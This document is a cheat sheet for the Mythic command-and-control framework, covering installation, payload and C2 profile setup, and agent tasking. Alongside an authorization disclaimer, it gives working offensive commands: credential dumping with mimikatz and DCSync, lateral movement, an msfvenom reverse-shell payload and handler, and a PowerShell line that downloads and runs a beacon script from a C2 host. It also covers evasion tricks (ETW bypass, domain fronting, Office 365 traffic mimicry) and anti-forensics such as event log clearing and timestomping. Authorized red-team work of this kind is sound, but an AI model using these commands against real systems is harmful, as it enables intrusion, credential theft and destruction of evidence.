Appearance
Mythic C2 Framework Cheat Sheet
Overview
Mythic is a modern, cross-platform command and control (C2) framework designed for red team operations and adversary emulation. Built with a containerized architecture using Docker, Mythic provides a collaborative web interface, supports multiple payload types, and offers extensive customization through its agent-based architecture with support for multiple programming languages.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
bash
# Install Docker and Docker Compose
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
sudo usermod -aG docker $USER
# Install Docker Compose
sudo curl -L "https://github.com/docker/compose/releases/download/v2.20.0/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
# Verify installation
docker --version
docker-compose --versionMythic Installation
bash
# Clone Mythic repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Make install script executable
chmod +x mythic-cli
# Install Mythic
sudo ./mythic-cli install
# Start Mythic services
sudo ./mythic-cli start
# Check status
sudo ./mythic-cli statusQuick Setup
bash
# One-liner installation
curl -sSL https://raw.githubusercontent.com/its-a-feature/Mythic/master/install.sh | bash
# Access web interface
# Navigate to https://localhost:7443
# Default credentials will be displayed during installationManual Docker Setup
bash
# Clone repository
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic
# Build containers
docker-compose build
# Start services
docker-compose up -d
# View logs
docker-compose logs -f mythic_serverBasic Configuration
Initial Setup
bash
# First-time configuration
1. Navigate to https://localhost:7443
2. Login with generated credentials
3. Complete initial setup wizard
4. Configure global settings
# Change default passwords
sudo ./mythic-cli config set MYTHIC_ADMIN_PASSWORD newpassword
sudo ./mythic-cli config set MYTHIC_SERVER_BIND_LOCALHOST_ONLY false
# Restart services
sudo ./mythic-cli restartSSL Configuration
bash
# Generate SSL certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /path/to/cert.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /path/to/key.pem
# Use Let's Encrypt
certbot certonly --standalone -d your-domain.com
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /etc/letsencrypt/live/your-domain.com/fullchain.pem
sudo ./mythic-cli config set MYTHIC_SERVER_KEY_PATH /etc/letsencrypt/live/your-domain.com/privkey.pem
# Restart with new certificates
sudo ./mythic-cli restartAgent Installation
bash
# Install popular agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apfell.git
sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon.git
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo.git
sudo ./mythic-cli install github https://github.com/MythicAgents/merlin.git
# List available agents
sudo ./mythic-cli list
# Start specific agent
sudo ./mythic-cli start apfellWeb Interface Navigation
Dashboard Overview
| Section | Description |
|---|---|
| Operations | Manage operations and campaigns |
| Payloads | Create and manage payload configurations |
| Callbacks | Active agent connections |
| Tasks | Command execution and task management |
| Files | File management and downloads |
| Credentials | Harvested credentials database |
| Artifacts | IOCs and forensic artifacts |
| Reporting | Generate operation reports |
Operations Management
bash
# Create new operation
1. Navigate to Operations → Create
2. Configure operation parameters:
- Name: Red Team Exercise 2024
- Description: Authorized penetration test
- Admin: [Your username]
- Complete: false
# Operation settings
- Webhook URL: [Slack/Teams integration]
- OPSEC: Enable/disable certain commands
- Logging: Configure audit loggingPayload Creation
Apfell (macOS/Linux) Payload
bash
# Create Apfell payload
1. Navigate to Payloads → Create
2. Select Apfell agent
3. Configure parameters:
- Payload Type: apfell
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 80
- Callback Interval: 10
- Jitter: 23
# Build options
- Output Format: bash, zsh, osascript, dylib
- Architecture: x64, arm64
- Obfuscation: Enable string obfuscationPoseidon (Cross-platform) Payload
bash
# Create Poseidon payload
1. Navigate to Payloads → Create
2. Select Poseidon agent
3. Configure parameters:
- Payload Type: poseidon
- C2 Profile: HTTP
- Callback Host: [Your IP/Domain]
- Callback Port: 443
- User Agent: Mozilla/5.0...
- Sleep: 5
- Jitter: 10
# Advanced options
- Proxy: Configure proxy settings
- Headers: Custom HTTP headers
- Encryption: AES encryption keyApollo (Windows) Payload
bash
# Create Apollo payload
1. Navigate to Payloads → Create
2. Select Apollo agent
3. Configure parameters:
- Payload Type: apollo
- C2 Profile: HTTP
- Architecture: x64, x86
- Format: exe, dll, shellcode
- Callback Host: [Your IP/Domain]
- Callback Port: 8080
# Windows-specific options
- PPID Spoofing: Enable parent process spoofing
- Block DLLs: Block non-Microsoft DLLs
- ETW Bypass: Enable ETW evasionC2 Profiles
HTTP Profile Configuration
json
{
"name": "HTTP Profile",
"description": "Standard HTTP communication",
"parameters": {
"callback_host": "192.168.1.100",
"callback_port": 80,
"killdate": "2024-12-31",
"encrypted_exchange_check": true,
"callback_jitter": 23,
"callback_interval": 10,
"get_uri": "/api/v1/status",
"post_uri": "/api/v1/data",
"query_path_name": "q",
"proxy_host": "",
"proxy_port": "",
"proxy_user": "",
"proxy_pass": ""
}
}HTTPS Profile Configuration
json
{
"name": "HTTPS Profile",
"description": "Encrypted HTTPS communication",
"parameters": {
"callback_host": "secure.example.com",
"callback_port": 443,
"callback_interval": 30,
"callback_jitter": 15,
"encrypted_exchange_check": true,
"ssl_cert_path": "/path/to/cert.pem",
"ssl_key_path": "/path/to/key.pem",
"headers": [
{
"name": "User-Agent",
"value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}
]
}
}WebSocket Profile
json
{
"name": "WebSocket Profile",
"description": "WebSocket-based communication",
"parameters": {
"callback_host": "ws.example.com",
"callback_port": 8080,
"endpoint": "/ws",
"user_agent": "Mozilla/5.0...",
"heartbeat_interval": 30
}
}Agent Management
Callback Interaction
bash
# Basic callback commands
help # Show available commands
whoami # Get current user
pwd # Current directory
ls # List directory contents
cd [path] # Change directory
cat [file] # Read file
download [file] # Download file
upload [local] [remote] # Upload file
shell [command] # Execute shell commandProcess Management
bash
# Process operations
ps # List processes
kill [pid] # Kill process
jobs # List background jobs
jobkill [jid] # Kill background job
# Process injection (Apollo)
inject [pid] [shellcode] # Inject shellcode
shinject [pid] [file] # Inject shellcode from file
dllload [dll] # Load DLLCredential Operations
bash
# Credential harvesting
mimikatz [command] # Execute Mimikatz
logonpasswords # Dump logon passwords
lsadump # Dump LSA secrets
dcsync [user] # DCSync attack
# Token manipulation
steal_token [pid] # Steal process token
make_token [user] [pass] # Create token
rev2self # Revert to selfLateral Movement
bash
# Remote execution
psexec [target] [command] # PSExec execution
wmiexec [target] [command] # WMI execution
smbexec [target] [command] # SMB execution
# PowerShell remoting
invoke_command [target] [command] # PowerShell remoting
enter_pssession [target] # Interactive PS session
# SSH (Poseidon)
ssh [target] [user] [key] # SSH connection
scp [source] [dest] # Secure copyAdvanced Features
SOCKS Proxy
bash
# Start SOCKS proxy
socks [port] # Start SOCKS4/5 proxy
socks_list # List active proxies
socks_kill [id] # Kill SOCKS proxy
# Use with external tools
proxychains -f /etc/proxychains.conf nmap -sT 192.168.1.0/24Port Forwarding
bash
# Local port forwarding
portfwd [local_port] [remote_host] [remote_port]
# Reverse port forwarding
rportfwd [remote_port] [local_host] [local_port]
# List active forwards
portfwd_list
# Kill port forward
portfwd_kill [id]File Operations
bash
# File management
mkdir [directory] # Create directory
rm [file] # Remove file
mv [source] [dest] # Move file
cp [source] [dest] # Copy file
chmod [mode] [file] # Change permissions
# Archive operations
zip [archive] [files] # Create zip archive
unzip [archive] # Extract archive
tar [options] [archive] # Tar operationsNetwork Discovery
bash
# Network reconnaissance
portscan [target] [ports] # Port scanning
ping [target] # ICMP ping
traceroute [target] # Trace route
arp # ARP table
netstat # Network connections
ifconfig # Network interfacesAutomation and Scripting
Task Automation
python
# Python automation script
import asyncio
import mythic
async def automated_recon(callback_id):
"""Automated reconnaissance on new callback"""
# Basic system information
tasks = [
"whoami",
"hostname",
"pwd",
"ps",
"ifconfig",
"netstat -an"
]
for task in tasks:
await mythic.issue_task(callback_id, task)
await asyncio.sleep(2)
# Credential harvesting if elevated
if await mythic.is_elevated(callback_id):
await mythic.issue_task(callback_id, "mimikatz logonpasswords")
await mythic.issue_task(callback_id, "lsadump")
# Register automation
mythic.register_callback_automation(automated_recon)Webhook Integration
python
# Slack webhook integration
import requests
import json
def send_slack_notification(callback_info):
"""Send Slack notification for new callbacks"""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
message = {
"text": f"New Mythic Callback",
"attachments": [
{
"color": "good",
"fields": [
{"title": "Host", "value": callback_info['host'], "short": True},
{"title": "User", "value": callback_info['user'], "short": True},
{"title": "Agent", "value": callback_info['agent'], "short": True},
{"title": "IP", "value": callback_info['ip'], "short": True}
]
}
]
}
requests.post(webhook_url, data=json.dumps(message),
headers={'Content-Type': 'application/json'})
# Configure webhook in Mythic
mythic.set_webhook_callback(send_slack_notification)Batch Operations
bash
#!/bin/bash
# Batch callback management script
MYTHIC_URL="https://localhost:7443"
API_TOKEN="your_api_token"
# Function to execute command on all callbacks
execute_on_all() {
local command=$1
# Get all active callbacks
callbacks=$(curl -s -k -H "Authorization: Bearer $API_TOKEN" \
"$MYTHIC_URL/api/v1.4/callbacks" | jq -r '.callbacks[].id')
for callback_id in $callbacks; do
echo "[+] Executing '$command' on callback $callback_id"
curl -s -k -X POST \
-H "Authorization: Bearer $API_TOKEN" \
-H "Content-Type: application/json" \
-d "{\"command\": \"$command\"}" \
"$MYTHIC_URL/api/v1.4/callbacks/$callback_id/tasks"
sleep 1
done
}
# Usage examples
execute_on_all "whoami"
execute_on_all "ps"
execute_on_all "netstat -an"Custom Agents
Agent Development Structure
python
# Custom agent template
from mythic_payloadtype_container.MythicCommandBase import *
from mythic_payloadtype_container.MythicRPC import *
class CustomAgent(PayloadType):
name = "custom_agent"
file_extension = "py"
author = "@your_handle"
supported_os = [SupportedOS.Windows, SupportedOS.Linux, SupportedOS.MacOS]
wrapper = False
wrapped_payloads = []
note = "Custom Python-based agent"
supports_dynamic_loading = True
async def build(self) -> BuildResponse:
# Build logic here
resp = BuildResponse(status=BuildStatus.Success)
return resp
# Command implementation
class WhoAmI(CommandBase):
cmd = "whoami"
needs_admin = False
help_cmd = "Get current user information"
description = "Execute whoami command"
version = 1
author = "@your_handle"
async def create_tasking(self, task: MythicTask) -> MythicTask:
task.display_params = "whoami"
return task
async def process_response(self, response: AgentResponse):
passAgent Communication
go
// Go agent communication example
package main
import (
"bytes"
"crypto/tls"
"encoding/json"
"net/http"
"time"
)
type Agent struct {
ID string
Host string
Port int
Interval time.Duration
Jitter int
}
func (a *Agent) Checkin() error {
checkinData := map[string]interface{}{
"action": "checkin",
"uuid": a.ID,
"ips": getLocalIPs(),
"os": getOSInfo(),
"user": getCurrentUser(),
"host": getHostname(),
"pid": getPID(),
"ppid": getPPID(),
}
jsonData, _ := json.Marshal(checkinData)
tr := &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{Transport: tr}
resp, err := client.Post(
fmt.Sprintf("https://%s:%d/api/v1.4/agent_message", a.Host, a.Port),
"application/json",
bytes.NewBuffer(jsonData),
)
if err != nil {
return err
}
defer resp.Body.Close()
return nil
}
func (a *Agent) GetTasks() ([]Task, error) {
// Implementation for getting tasks
return nil, nil
}
func (a *Agent) SendResponse(taskID string, response string) error {
// Implementation for sending task responses
return nil
}Integration with Other Tools
Metasploit Integration
bash
# Use Mythic with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Mythic callback
upload meterpreter.exe /tmp/meterpreter.exe
# Execute Metasploit payload
shell /tmp/meterpreter.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
runBloodHound Integration
bash
# Collect BloodHound data via Mythic
# Upload SharpHound
upload SharpHound.exe /tmp/sharphound.exe
# Run collection
shell /tmp/sharphound.exe -c All -d domain.local --zipfilename bloodhound.zip
# Download results
download /tmp/bloodhound.zip
# Import into BloodHound
neo4j start
./BloodHound --no-sandboxCobalt Strike Integration
bash
# Beacon integration
# Generate Cobalt Strike beacon
# Use Mythic for initial access, pivot to Beacon
# From Mythic callback
shell powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team serverOperational Security
Communication Security
bash
# Domain fronting configuration
# Configure CDN (CloudFlare, AWS CloudFront)
# Set up domain fronting rules
# Update C2 profile with fronted domain
# Certificate management
# Use legitimate SSL certificates
# Implement certificate pinning
# Rotate certificates regularlyTraffic Analysis Evasion
bash
# Malleable profiles
# Mimic legitimate applications
# Use common user agents
# Implement realistic timing
# Example profile mimicking Office 365
{
"name": "Office365",
"user_agent": "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.12026; Pro)",
"get_uri": "/owa/auth/logon.aspx",
"post_uri": "/owa/auth/owaauth.dll",
"headers": [
{"name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"},
{"name": "Accept-Language", "value": "en-US,en;q=0.5"},
{"name": "Accept-Encoding", "value": "gzip, deflate"}
]
}Anti-Forensics
bash
# Event log clearing
shell wevtutil cl System
shell wevtutil cl Security
shell wevtutil cl Application
# Timestomping
shell powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Memory cleanup
# Implement secure memory wiping
# Use process migration
# Clear command historyTroubleshooting
Common Issues
bash
# Callback not connecting
1. Check firewall rules
2. Verify C2 profile configuration
3. Test network connectivity
4. Check DNS resolution
# SSL/TLS issues
# Regenerate certificates
sudo ./mythic-cli config set MYTHIC_SERVER_CERT_PATH /new/path/cert.pem
sudo ./mythic-cli restart
# Container issues
# Check Docker status
docker ps -a
docker logs mythic_server
# Restart services
sudo ./mythic-cli restartDebug Mode
bash
# Enable debug logging
sudo ./mythic-cli config set MYTHIC_DEBUG_LEVEL DEBUG
sudo ./mythic-cli restart
# View logs
sudo ./mythic-cli logs
# Database issues
# Access PostgreSQL
docker exec -it mythic_postgres psql -U mythic_user -d mythic_db
# Reset database
sudo ./mythic-cli database resetPerformance Optimization
bash
# Optimize Docker resources
# Increase memory allocation
sudo ./mythic-cli config set MYTHIC_DOCKER_MEMORY 4g
# Optimize callback intervals
# Increase sleep time for stealth
# Reduce jitter for faster response
# Database optimization
# Regular database maintenance
# Index optimization
# Query performance tuningBest Practices
Operational Planning
- Pre-engagement setup: Configure profiles and agents before engagement
- Team coordination: Use operation management for team collaboration
- Communication protocols: Establish clear C2 communication channels
- Data handling: Implement secure data collection and exfiltration
- Cleanup procedures: Plan for artifact removal and operational cleanup
Security Considerations
bash
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Agent management
# Use unique agent configurations
# Implement kill dates
# Regular agent rotation
# Secure communication channelsDocumentation and Reporting
bash
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution preventionResources
- Mythic GitHub Repository
- Mythic Documentation
- Mythic Agents Repository
- Mythic C2 Profiles
- Red Team Village Mythic Training
This cheat sheet provides a comprehensive reference for using Mythic C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.